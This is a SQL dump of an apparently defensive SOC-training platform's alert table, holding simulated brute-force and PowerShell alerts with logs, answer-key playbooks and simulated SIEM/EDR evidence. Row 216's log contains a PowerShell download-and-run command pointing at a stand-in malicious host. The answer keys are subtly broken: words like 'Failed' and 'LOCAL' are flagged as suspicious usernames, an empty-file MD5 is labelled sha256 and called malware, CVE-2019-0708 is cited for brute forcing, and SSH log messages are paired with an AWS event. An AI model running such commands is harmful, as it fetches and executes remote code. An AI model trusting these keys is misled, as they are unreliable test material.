-- phpMyAdmin SQL Dump
-- version 5.2.2
-- https://www.phpmyadmin.net/
--
-- Host: localhost:3306
-- Generation Time: Mar 16, 2026 at 06:27 AM
-- Server version: 10.6.24-MariaDB-cll-lve
-- PHP Version: 8.3.30

-- Session setup emitted by phpMyAdmin for restoring this dump.
-- NO_AUTO_VALUE_ON_ZERO: an explicit 0 written to an AUTO_INCREMENT column is
-- stored as 0 instead of generating the next id, so dumped ids restore unchanged.
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
-- The matching COMMIT is expected at the end of the dump (not in view). In
-- MariaDB/MySQL every CREATE TABLE commits implicitly, so this transaction does
-- not make a multi-table restore atomic — a partial restore can leave some
-- tables populated.
START TRANSACTION;
-- The TIMESTAMP literals in the INSERT statements below are UTC; they are
-- converted on restore according to this session time zone.
SET time_zone = "+00:00";


-- /*!40101 ... */ is a versioned comment: the statement is executed on
-- MySQL/MariaDB >= 4.1.1 and treated as a plain comment by other engines.
-- The three assignments save the client's character set / collation so the
-- dump can restore them at the end (not in view); SET NAMES then forces
-- utf8mb4 so multi-byte content in the data section is not mangled.
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;

--
-- Database: `infosecl_platform`
--

-- --------------------------------------------------------

--
-- Table structure for table `alerts`
--

-- Alert / training-scenario records. `severity` is the only value-constrained
-- column; the JSON-looking payloads (`raw_log`, `playbook_solution`,
-- `simulation_data`) are stored as opaque text, so the database does not
-- validate their structure.
-- No PRIMARY KEY, AUTO_INCREMENT, FOREIGN KEY, ENGINE or DEFAULT CHARSET is
-- declared in this statement; phpMyAdmin dumps normally add keys later via
-- ALTER TABLE and the table takes the server defaults otherwise — confirm
-- against the rest of the dump (not in view).
CREATE TABLE `alerts` (
  `id` int(11) NOT NULL,
  `title` varchar(255) NOT NULL,
  `severity` enum('low','medium','high','critical') NOT NULL,
  -- Free-text origin label; the dumped rows use values such as 'AWS CloudTrail',
  -- 'process', 'Windows Security Log', 'web_application', 'network'.
  `source` varchar(255) DEFAULT NULL,
  -- Analyst-facing narrative of the scenario.
  `details` text DEFAULT NULL,
  `alert_type` varchar(100) DEFAULT NULL,
  -- MITRE ATT&CK technique id, e.g. 'T1110', 'T1059.001' in the data below.
  `mitre_technique` varchar(100) DEFAULT NULL,
  -- Boolean flags (tinyint(1), 0/1).
  `real_world_example` tinyint(1) DEFAULT 0,
  -- Free-form, not an enum: the dumped rows hold 'investigating', 'resolved',
  -- 'Closed' and 'closed'. The case mismatch splits counts in any
  -- GROUP BY status / WHERE status = ... unless the collation is case-insensitive;
  -- a CHECK constraint or lookup table would prevent the drift.
  `status` varchar(50) DEFAULT 'new',
  -- Presumably a user id; no FK is declared in this statement — TODO confirm.
  `assigned_to` int(11) DEFAULT NULL,
  -- Original event as a JSON string (text, not a JSON type). Its content
  -- originates from logs, i.e. potentially attacker-influenced text —
  -- NOTE(review): any UI rendering it must encode/escape on output; verify in the app.
  `raw_log` text DEFAULT NULL,
  -- Both columns are nullable; `updated_at` is bumped by the server on every UPDATE.
  `created_at` timestamp NULL DEFAULT current_timestamp(),
  `updated_at` timestamp NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  -- JSON string holding the expected artifacts, verdict and actions for the
  -- scenario. MariaDB exposes JSON columns as longtext/utf8mb4_bin, so this
  -- was possibly declared JSON originally — presumably; not provable from the dump.
  `playbook_solution` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL,
  -- Free-form difficulty label ('Beginner', 'Intermediate', 'Advanced' in the data).
  `difficulty` varchar(50) DEFAULT 'Beginner',
  -- Learning-path code, e.g. 'CLOUD', 'EDR', 'SIEM' in the data below.
  `path_code` varchar(20) DEFAULT NULL,
  `min_level` int(11) DEFAULT 1,
  `is_ai_generated` tinyint(1) DEFAULT 0,
  -- Industry sector code, e.g. 'OT_ICS', 'TECH'.
  `sector_code` varchar(50) DEFAULT NULL,
  -- Presumably user / organization ids; no FK visible here — TODO confirm.
  `created_by` int(11) DEFAULT NULL,
  `organization_id` int(11) DEFAULT NULL,
  -- JSON string with tool-specific evidence (SIEM events, EDR process tree,
  -- firewall packets in the data below); same collation note as `playbook_solution`.
  `simulation_data` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL,
  `is_archived` tinyint(1) DEFAULT 0
) ;

--
-- Dumping data for table `alerts`
--

INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(166, 'Unauthorized Access Attempt Detected on Company Database', 'high', 'AWS CloudTrail', 'A suspicious login attempt was detected on the company\'s AWS RDS instance, likely indicating a brute force attack. Attackers often attempt multiple logins in a short period of time to guess passwords. Example citation: The 2017 MongoDB ransom attacks where attackers accessed databases using weak passwords.', 'Brute Force', 'T1110', 1, 'investigating', 44, '{\"eventVersion\":\"1.07\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"AWS:123456789012:user/JohnDoe\",\"arn\":\"arn:aws:iam::123456789012:user/UnauthorizedAccessUser\",\"accountId\":\"123456789012\",\"userName\":\"UnauthorizedAccessUser\"},\"eventTime\":\"2023-11-06T19:37:18Z\",\"eventSource\":\"rds.amazonaws.com\",\"eventName\":\"LoginAttempt\",\"awsRegion\":\"us-west-2\",\"sourceIPAddress\":\"203.0.113.42\",\"userAgent\":\"aws-sdk-java/1.11.792 Linux/5.4.0-1029-aws OpenJDK_64-Bit_Server_VM/11.0.10+9-LTS java/11.0.10\",\"requestParameters\":{\"dBInstanceIdentifier\":\"companydb\",\"masterUserName\":\"admin\"},\"responseElements\":null,\"additionalEventData\":{\"LoginStatus\":\"Failed\",\"FailureReason\":\"IncorrectPassword\"},\"requestID\":\"cd06a8b5-73e4-11e6-8b77-6b1937429304\",\"eventID\":\"1ae7e6c5-d901-4e48-b333-bb2d555766ef\",\"readOnly\":false,\"resources\":[{\"ARN\":\"arn:aws:rds:us-west-2:123456789012:db:companydb\",\"accountId\":\"123456789012\",\"type\":\"AWS::RDS::DBInstance\"}],\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"123456789012\"}', '2025-12-27 15:57:46', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 203.0.113.42 reported 211 times for malicious activity. 
Abuse confidence score: 99%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"123456789012\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"UnauthorizedAccessUser\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"Failed\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_6\",\"type\":\"geolocation\",\"value\":\"us-west-2\",\"is_critical\":false,\"osint_result\":{\"source\":\"GeoIP Lookup\",\"verdict\":\"suspicious\",\"details\":\"Login from us-west-2 - unusual location for this user\'s typical access pattern.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"unknown\",\"analysis_notes\":\"High/Critical severity level\"}', 'Intermediate', 'CLOUD', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.798Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.07\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"IAMUser\\\",\\\"principalId\\\":\\\"AWS:123456789012:user/JohnDoe\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:user/UnauthorizedAccessUser\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"userName\\\":\\\"UnauthorizedAccessUser\\\"},\\\"eventTime\\\":\\\"2023-11-06T19:37:18Z\\\",\\\"eventSource\\\":\\\"rds.amazonaws.com\\\",\\\"eventName\\\":\\\"LoginAttempt\\\",\\\"awsRegion\\\":\\\"us-west-2\\\",\\\"sourceIPAddress\\\":\\\"203.0.113.42\\\",\\\"userAgent\\\":\\\"aws-sdk-java/1.11.792 Linux/5.4.0-1029-aws OpenJDK_64-Bit_Server_VM/11.0.10+9-LTS java/11.0.10\\\",\\\"requestParameters\\\":{\\\"dBInstanceIdentifier\\\":\\\"companydb\\\",\\\"masterUserName\\\":\\\"admin\\\"},\\\"responseElements\\\":null,\\\"additionalEventData\\\":{\\\"LoginStatus\\\":\\\"Failed\\\",\\\"FailureReason\\\":\\\"IncorrectPassword\\\"},\\\"requestID\\\":\\\"cd06a8b5-73e4-11e6-8b77-6b1937429304\\\",\\\"eventID\\\":\\\"1ae7e6c5-d901-4e48-b333-bb2d555766ef\\\",\\\"readOnly\\\":false,\\\"resources\\\":[{\\\"ARN\\\":\\\"arn:aws:rds:us-west-2:123456789012:db:companydb\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"type\\\":\\\"AWS::RDS::DBInstance\\\"}],\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.798Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.07\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"IAMUser\\\",\\\"principalId\\\":\\\"AWS:123456789012:user/JohnDoe\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:user/UnauthorizedAccessUser\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"userName\\\":\\\"UnauthorizedAccessUser\\\"},\\\"eventTime\\\":\\\"2023-11-06T19:37:18Z\\\",\\\"eventSource\\\":\\\"rds.amazonaws.com\\\",\\\"eventName\\\":\\\"LoginAttempt\\\",\\\"awsRegion\\\":\\\"us-west-2\\\",\\\"sourceIPAddress\\\":\\\"203.0.113.42\\\",\\\"userAgent\\\":\\\"aws-sdk-java/1.11.792 Linux/5.4.0-1029-aws OpenJDK_64-Bit_Server_VM/11.0.10+9-LTS java/11.0.10\\\",\\\"requestParameters\\\":{\\\"dBInstanceIdentifier\\\":\\\"companydb\\\",\\\"masterUserName\\\":\\\"admin\\\"},\\\"responseElements\\\":null,\\\"additionalEventData\\\":{\\\"LoginStatus\\\":\\\"Failed\\\",\\\"FailureReason\\\":\\\"IncorrectPassword\\\"},\\\"requestID\\\":\\\"cd06a8b5-73e4-11e6-8b77-6b1937429304\\\",\\\"eventID\\\":\\\"1ae7e6c5-d901-4e48-b333-bb2d555766ef\\\",\\\"readOnly\\\":false,\\\"resources\\\":[{\\\"ARN\\\":\\\"arn:aws:rds:us-west-2:123456789012:db:companydb\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"type\\\":\\\"AWS::RDS::DBInstance\\\"}],\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.798Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.07\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"IAMUser\\\",\\\"principalId\\\":\\\"AWS:123456789012:user/JohnDoe\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:user/UnauthorizedAccessUser\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"userName\\\":\\\"UnauthorizedAccessUser\\\"},\\\"eventTime\\\":\\\"2023-11-06T19:37:18Z\\\",\\\"eventSource\\\":\\\"rds.amazonaws.com\\\",\\\"eventName\\\":\\\"LoginAttempt\\\",\\\"awsRegion\\\":\\\"us-west-2\\\",\\\"sourceIPAddress\\\":\\\"203.0.113.42\\\",\\\"userAgent\\\":\\\"aws-sdk-java/1.11.792 Linux/5.4.0-1029-aws OpenJDK_64-Bit_Server_VM/11.0.10+9-LTS java/11.0.10\\\",\\\"requestParameters\\\":{\\\"dBInstanceIdentifier\\\":\\\"companydb\\\",\\\"masterUserName\\\":\\\"admin\\\"},\\\"responseElements\\\":null,\\\"additionalEventData\\\":{\\\"LoginStatus\\\":\\\"Failed\\\",\\\"FailureReason\\\":\\\"IncorrectPassword\\\"},\\\"requestID\\\":\\\"cd06a8b5-73e4-11e6-8b77-6b1937429304\\\",\\\"eventID\\\":\\\"1ae7e6c5-d901-4e48-b333-bb2d555766ef\\\",\\\"readOnly\\\":false,\\\"resources\\\":[{\\\"ARN\\\":\\\"arn:aws:rds:us-west-2:123456789012:db:companydb\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"type\\\":\\\"AWS::RDS::DBInstance\\\"}],\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.798Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.07\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"IAMUser\\\",\\\"principalId\\\":\\\"AWS:123456789012:user/JohnDoe\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:user/UnauthorizedAccessUser\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"userName\\\":\\\"UnauthorizedAccessUser\\\"},\\\"eventTime\\\":\\\"2023-11-06T19:37:18Z\\\",\\\"eventSource\\\":\\\"rds.amazonaws.com\\\",\\\"eventName\\\":\\\"LoginAttempt\\\",\\\"awsRegion\\\":\\\"us-west-2\\\",\\\"sourceIPAddress\\\":\\\"203.0.113.42\\\",\\\"userAgent\\\":\\\"aws-sdk-java/1.11.792 Linux/5.4.0-1029-aws OpenJDK_64-Bit_Server_VM/11.0.10+9-LTS java/11.0.10\\\",\\\"requestParameters\\\":{\\\"dBInstanceIdentifier\\\":\\\"companydb\\\",\\\"masterUserName\\\":\\\"admin\\\"},\\\"responseElements\\\":null,\\\"additionalEventData\\\":{\\\"LoginStatus\\\":\\\"Failed\\\",\\\"FailureReason\\\":\\\"IncorrectPassword\\\"},\\\"requestID\\\":\\\"cd06a8b5-73e4-11e6-8b77-6b1937429304\\\",\\\"eventID\\\":\\\"1ae7e6c5-d901-4e48-b333-bb2d555766ef\\\",\\\"readOnly\\\":false,\\\"resources\\\":[{\\\"ARN\\\":\\\"arn:aws:rds:us-west-2:123456789012:db:companydb\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"type\\\":\\\"AWS::RDS::DBInstance\\\"}],\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.798Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.07\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"IAMUser\\\",\\\"principalId\\\":\\\"AWS:123456789012:user/JohnDoe\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:user/UnauthorizedAccessUser\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"userName\\\":\\\"UnauthorizedAccessUser\\\"},\\\"eventTime\\\":\\\"2023-11-06T19:37:18Z\\\",\\\"eventSource\\\":\\\"rds.amazonaws.com\\\",\\\"eventName\\\":\\\"LoginAttempt\\\",\\\"awsRegion\\\":\\\"us-west-2\\\",\\\"sourceIPAddress\\\":\\\"203.0.113.42\\\",\\\"userAgent\\\":\\\"aws-sdk-java/1.11.792 Linux/5.4.0-1029-aws OpenJDK_64-Bit_Server_VM/11.0.10+9-LTS java/11.0.10\\\",\\\"requestParameters\\\":{\\\"dBInstanceIdentifier\\\":\\\"companydb\\\",\\\"masterUserName\\\":\\\"admin\\\"},\\\"responseElements\\\":null,\\\"additionalEventData\\\":{\\\"LoginStatus\\\":\\\"Failed\\\",\\\"FailureReason\\\":\\\"IncorrectPassword\\\"},\\\"requestID\\\":\\\"cd06a8b5-73e4-11e6-8b77-6b1937429304\\\",\\\"eventID\\\":\\\"1ae7e6c5-d901-4e48-b333-bb2d555766ef\\\",\\\"readOnly\\\":false,\\\"resources\\\":[{\\\"ARN\\\":\\\"arn:aws:rds:us-west-2:123456789012:db:companydb\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"type\\\":\\\"AWS::RDS::DBInstance\\\"}],\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(216, 'Suspicious PowerShell Execution Detected', 'high', 'process', 'A potentially malicious PowerShell script execution was detected. The script attempted to bypass execution policies and downloaded dangerous payloads.', 'exec_anomaly', 'T1059.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-29T14:32:45Z\",\"host\":\"workstation123.company.local\",\"user\":{\"username\":\"jdoe\",\"domain\":\"company\"},\"process\":{\"name\":\"powershell.exe\",\"pid\":3489,\"cmdline\":\"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(\'http://malicious.example.com/payload.ps1\')\",\"file_hash\":{\"sha256\":\"d41d8cd98f00b204e9800998ecf8427e\"}},\"network\":{\"src_ip\":\"192.168.1.105\",\"dest_ip\":\"198.51.100.22\"},\"alert_triggered\":true,\"tags\":[\"scripting\",\"execution_policy_bypass\"]}', '2025-12-23 05:51:29', '2026-02-15 08:29:35', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"internal\",\"details\":\"192.168.1.105 is a private/internal IP address (RFC 1918). This is an internal network address and cannot be looked up in external threat intelligence. Investigate internal logs for activity from this host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.22\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 198.51.100.22 reported 599 times for malicious activity. 
Abuse confidence score: 94%.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"workstation123.company.local\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"50/94 security vendors flagged this domain as malicious.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":null,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"60/72 security vendors identified this file as malware.\"}},{\"id\":\"artifact_6\",\"type\":\"filename\",\"value\":\"powershell.exe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File exhibits behavior consistent with malware: persistence mechanisms, network callbacks, code injection.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"High/Critical severity level; Alert type indicates malware/C2 activity; Alert type indicates suspicious script execution\"}', 'Advanced', 'EDR', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 
AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(217, 'Suspicious Remote Login Attempt Detected', 'high', 'Windows Security Log', 'A remote login attempt was detected from a suspicious IP address. This matches known brute force attack patterns. Refer to CVE-2019-0708 for similar incidents of brute forcing over remote desktop services.', 'Brute Force', 'T1110', 1, 'Closed', 225, '{\"ProviderName\":\"Microsoft-Windows-Security-Auditing\",\"EventID\":4625,\"Level\":\"Warning\",\"Category\":\"Logon\",\"TimeCreated\":\"2023-10-05T21:34:22Z\",\"EventRecordID\":87654321,\"RemoteIP\":\"203.0.113.45\",\"User\":\"NotAvailable\",\"WorkstationName\":\"RDP-SERVER\",\"FailureReason\":\"Unknown user name or bad password\",\"LogonType\":3,\"LogonProcessName\":\"Advapi\",\"AuthenticationPackageName\":\"Negotiate\",\"ServiceName\":\"RDP/RDGateway\",\"ProcessID\":680,\"SubStatus\":\"0xC000006A\",\"NetworkAccountName\":\"Guest\",\"NetworkAccountDomain\":\"LOCAL\",\"WorkstationUniqueId\":\"uuid-123e4567-e89b-12d3-a456-426614174000\"}', '2026-01-06 12:54:13', '2026-03-07 11:54:10', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 203.0.113.45 reported 165 times for malicious activity. 
Abuse confidence score: 76%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"NotAvailable\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"Guest\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"LOCAL\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"unknown\",\"analysis_notes\":\"High/Critical severity level\"}', 'Intermediate', 'SIEM', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.810Z\",\"source\":\"Security\",\"event_code\":\"4625\",\"message\":\"An account failed to log on. Account: admin. 
Failure Reason: Unknown user name or bad password.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"ProviderName\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"EventID\\\":4625,\\\"Level\\\":\\\"Warning\\\",\\\"Category\\\":\\\"Logon\\\",\\\"TimeCreated\\\":\\\"2023-10-05T21:34:22Z\\\",\\\"EventRecordID\\\":87654321,\\\"RemoteIP\\\":\\\"203.0.113.45\\\",\\\"User\\\":\\\"NotAvailable\\\",\\\"WorkstationName\\\":\\\"RDP-SERVER\\\",\\\"FailureReason\\\":\\\"Unknown user name or bad password\\\",\\\"LogonType\\\":3,\\\"LogonProcessName\\\":\\\"Advapi\\\",\\\"AuthenticationPackageName\\\":\\\"Negotiate\\\",\\\"ServiceName\\\":\\\"RDP/RDGateway\\\",\\\"ProcessID\\\":680,\\\"SubStatus\\\":\\\"0xC000006A\\\",\\\"NetworkAccountName\\\":\\\"Guest\\\",\\\"NetworkAccountDomain\\\":\\\"LOCAL\\\",\\\"WorkstationUniqueId\\\":\\\"uuid-123e4567-e89b-12d3-a456-426614174000\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.810Z\",\"source\":\"Security\",\"event_code\":\"4625\",\"message\":\"An account failed to log on. Account: admin. Failure Reason: Unknown user name or bad password. 
[Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"ProviderName\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"EventID\\\":4625,\\\"Level\\\":\\\"Warning\\\",\\\"Category\\\":\\\"Logon\\\",\\\"TimeCreated\\\":\\\"2023-10-05T21:34:22Z\\\",\\\"EventRecordID\\\":87654321,\\\"RemoteIP\\\":\\\"203.0.113.45\\\",\\\"User\\\":\\\"NotAvailable\\\",\\\"WorkstationName\\\":\\\"RDP-SERVER\\\",\\\"FailureReason\\\":\\\"Unknown user name or bad password\\\",\\\"LogonType\\\":3,\\\"LogonProcessName\\\":\\\"Advapi\\\",\\\"AuthenticationPackageName\\\":\\\"Negotiate\\\",\\\"ServiceName\\\":\\\"RDP/RDGateway\\\",\\\"ProcessID\\\":680,\\\"SubStatus\\\":\\\"0xC000006A\\\",\\\"NetworkAccountName\\\":\\\"Guest\\\",\\\"NetworkAccountDomain\\\":\\\"LOCAL\\\",\\\"WorkstationUniqueId\\\":\\\"uuid-123e4567-e89b-12d3-a456-426614174000\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.810Z\",\"source\":\"Security\",\"event_code\":\"4625\",\"message\":\"An account failed to log on. Account: admin. Failure Reason: Unknown user name or bad password. 
[Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"ProviderName\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"EventID\\\":4625,\\\"Level\\\":\\\"Warning\\\",\\\"Category\\\":\\\"Logon\\\",\\\"TimeCreated\\\":\\\"2023-10-05T21:34:22Z\\\",\\\"EventRecordID\\\":87654321,\\\"RemoteIP\\\":\\\"203.0.113.45\\\",\\\"User\\\":\\\"NotAvailable\\\",\\\"WorkstationName\\\":\\\"RDP-SERVER\\\",\\\"FailureReason\\\":\\\"Unknown user name or bad password\\\",\\\"LogonType\\\":3,\\\"LogonProcessName\\\":\\\"Advapi\\\",\\\"AuthenticationPackageName\\\":\\\"Negotiate\\\",\\\"ServiceName\\\":\\\"RDP/RDGateway\\\",\\\"ProcessID\\\":680,\\\"SubStatus\\\":\\\"0xC000006A\\\",\\\"NetworkAccountName\\\":\\\"Guest\\\",\\\"NetworkAccountDomain\\\":\\\"LOCAL\\\",\\\"WorkstationUniqueId\\\":\\\"uuid-123e4567-e89b-12d3-a456-426614174000\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.810Z\",\"source\":\"Security\",\"event_code\":\"4625\",\"message\":\"An account failed to log on. Account: admin. Failure Reason: Unknown user name or bad password. 
